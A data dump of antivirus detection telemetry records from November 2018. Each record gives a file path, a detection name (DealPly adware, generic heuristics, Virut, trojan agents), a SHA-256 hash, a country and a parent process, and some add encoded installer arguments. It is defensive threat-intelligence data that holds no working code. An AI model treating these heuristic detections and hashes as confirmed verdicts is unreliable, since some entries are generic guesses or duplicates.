  Row(detection=Row(filename='avscan-20181102-190807-8fb01c92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7bcbe83b\\AVSCAN-20181102-185817-366C7C7C\\AVSCAN-20181102-190807-8FB01C92', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:08:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1172221\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:51:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7312997\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/host:beR0dVfLWwIgvHVgT94QBiG7eGNPzlYAIKN5c0ubSx5\\\\\\/\\\\\\/WRUHosFB3v\\\\\\/cHdVmggSIa3FlQ \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\MEUS DOCUMENTOS\\Downloads\\DOWNLOADS DO CHROME\\JavaSetup_3381338380.exe', parentsize=2357220, timestamp='2018-11-02T22:48:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4944545\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:27:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4944545\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\pivot_v4-2.exe', parentsize=1903968, timestamp='2018-11-02T18:27:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8073104\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:25:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Documents and Settings\\X\\Configuración local\\Temp\\tmp9958289\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:54:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8716972\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='E:\\Dados Usuário\\Downloads\\Baixaki_Virtual DJ_3938780979.exe', parentsize=2300160, timestamp='2018-11-02T18:40:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9942144\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/ref:YHR0cVpbWxU1LDV5Wk1RVyk\\\\\\/Mj9EWEBUajsvOUVIXVotJTooRkFJSjIvOhVRXEo...w5xRzZlNwB7NQZPDX1hcjdSThZYJSB6N0RgcQg \\\\\\/host:YgR0c1grWwQvXHVgTjgUCCFceWdHMw1JJF...2c4LEZXARVzZDcsQVEZSTk0bT1JDkISPnl8k3o \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Free VPN Unlimited Proxy - Proxy Master_Setup_1099536925.exe', parentsize=2301712, timestamp='2018-11-02T02:43:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9942144\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3725640, timestamp='2018-11-02T02:43:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8716972\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:40:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\USERS\\X\\APPDATA\\LOCAL\\Temp\\tmp8737939\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:T3RNZyFaKB9EbHY2 \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Programs\\IDM 6.28 Build 1 Registered (32bit   64bit Patch) [CrackingPatching].zip_3775744256.exe', parentsize=2409021, timestamp='2018-11-02T01:01:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8073104\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\JavaSetup_3350226355.exe', parentsize=2446409, timestamp='2018-11-02T19:25:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4170681\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='E:\\GAMES dari Pakdhe\\Download Trainz Simulator v1.3.7 cafe4ndroid.com.apk_4098468946.exe', parentsize=2409021, timestamp='2018-11-02T02:43:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\USERS\\X\\APPDATA\\LOCAL\\Temp\\tmp8737939\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:01:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9942144\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:43:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0001e203', filepath='C:\\Windows\\Temp\\5f1f5a26-64d4-4ede-8d54-7fccfe113629\\tmp00000160\\tmp0001e203', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T09:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0001e076', filepath='C:\\Windows\\Temp\\5f1f5a26-64d4-4ede-8d54-7fccfe113629\\tmp00000160\\tmp0001e076', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T09:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0001e076', filepath='C:\\Windows\\Temp\\5f1f5a26-64d4-4ede-8d54-7fccfe113629\\tmp00000160\\tmp0001e076', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T09:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3291609\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Downloads\\Baixaki_Image Comparator_1353295777.exe', parentsize=2292152, timestamp='2018-11-02T02:31:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7611427\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Odin3_v1.85.exe', parentsize=2821656, timestamp='2018-11-02T02:15:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4175421\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Programs\\pivot_v4-2.exe', parentsize=1903968, timestamp='2018-11-02T13:29:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4175421\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:29:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\TEMP\\tmp1221605\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\aTube_Catcher_1857970943.exe', parentsize=2610712, timestamp='2018-11-02T14:27:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9422657\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\SELEÇÃO - HALLOWEEN DO PAGODÃO [NOVEMBRO 2018] www.PuroPagodao.NET_1112844188.exe', parentsize=2473080, timestamp='2018-11-02T22:03:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2206716\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\MP3Rocket_Setup (1).exe', parentsize=1844048, timestamp='2018-11-02T20:26:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-215438-7496f7cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24d607a4\\AVSCAN-20181102-215410-7151B390\\AVSCAN-20181102-215438-7496F7CB', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:54:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1254700\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:56:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1254700\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc="C:\\Users\\X\\Downloads\\' PH Paulo Henrique - CD Promocional 2018_3573571827.exe", parentsize=2473080, timestamp='2018-11-02T18:56:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7146048\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/MONITOR', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-02T23:55:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00008cf8', filepath='C:\\Windows\\Temp\\7e07bae2-2977-4277-ae90-d6d5f573fbdf\\tmp000000b9\\tmp00008cf8', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='18490d25bdc19b6e58c1d25addef75fb7c3bf786fe1f1a8e49e7a42ac7b8f0a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.0.604.11072\\AdAwareService.exe', parentsize=585784, timestamp='2018-11-02T11:06:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\setup.exe', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T15:53:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172529-bf5be6f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d890e6\\AVSCAN-20181102-172520-BDB58A42\\AVSCAN-20181102-172529-BF5BE6F0', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:25:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='F:\\setup.exe', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T07:41:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172621-c8a85673', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d890e6\\AVSCAN-20181102-172612-C705156D\\AVSCAN-20181102-172621-C8A85673', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:26:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-165850-9f31052f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d890e6\\AVSCAN-20181102-165840-9D54F749\\AVSCAN-20181102-165850-9F31052F', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:58:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163338-0e6b9122', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_731bb7c6\\AVSCAN-20181102-163329-0CD40CF0\\AVSCAN-20181102-163338-0E6B9122', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:33:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163234-02f7f090', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_731bb7c6\\AVSCAN-20181102-163226-01635032\\AVSCAN-20181102-163234-02F7F090', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:32:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163147-fa833884', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_731bb7c6\\AVSCAN-20181102-163137-F8981695\\AVSCAN-20181102-163147-FA833884', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\setup.exe', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T15:29:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163410-142fe4c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_731bb7c6\\AVSCAN-20181102-163401-1297175E\\AVSCAN-20181102-163410-142FE4C9', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:34:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172722-d3b844fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d890e6\\AVSCAN-20181102-172713-D2144126\\AVSCAN-20181102-172722-D3B844FE', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:27:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132745-654ccecd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_35c26308\\AVSCAN-20181102-132144-35D13AB6\\AVSCAN-20181102-132745-654CCECD', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='187cc279f5886f476b8c0a00076a9198385e47a5d7afab22376ddc9ca8965e27', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:27:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='188b28fbff3e4d12c611cd81c7d5f775a9bacfad56e8e8765d968c7ce349ba3b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-6.categorizing\\188B28FBFF3E4D12C611CD81C7D5F775A9BACFAD56E8E8765D968C7CE349BA3B', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='188b28fbff3e4d12c611cd81c7d5f775a9bacfad56e8e8765d968c7ce349ba3b', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T13:21:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='188b28fbff3e4d12c611cd81c7d5f775a9bacfad56e8e8765d968c7ce349ba3b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-6\\188B28FBFF3E4D12C611CD81C7D5F775A9BACFAD56E8E8765D968C7CE349BA3B', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='188b28fbff3e4d12c611cd81c7d5f775a9bacfad56e8e8765d968c7ce349ba3b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:29:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ae-ef03-e-psp2$项目进度计划(软件修订记录).xls', filepath='C:\\Users\\X\\Desktop\\AE-EF03-E-PSP2$项目进度计划(软件修订记录).xls', filesize=128000, name='X2000M/Agent.6489234.#M1.#R1'), hash='1899d4d9c91fcb27d40e5323532cda1136d9eb1526a5e0591d4ba733d9f3b624', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:29:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ae-ef03-e-psp2$项目进度计划(软件修订记录).xls', filepath='C:\\Users\\X\\Desktop\\AE-EF03-E-PSP2$项目进度计划(软件修订记录).xls', filesize=128000, name='X2000M/Agent.6489234.#M1.#R1'), hash='1899d4d9c91fcb27d40e5323532cda1136d9eb1526a5e0591d4ba733d9f3b624', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:29:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143051-400a18c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4d4b5374\\AVSCAN-20181102-143025-3ACFD805\\AVSCAN-20181102-143051-400A18C8', filesize=128000, name='X2000M/Agent.6489234.#M1.#R1'), hash='1899d4d9c91fcb27d40e5323532cda1136d9eb1526a5e0591d4ba733d9f3b624', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:30:45Z'), dt=datetime.date(2018, 11, 2)),
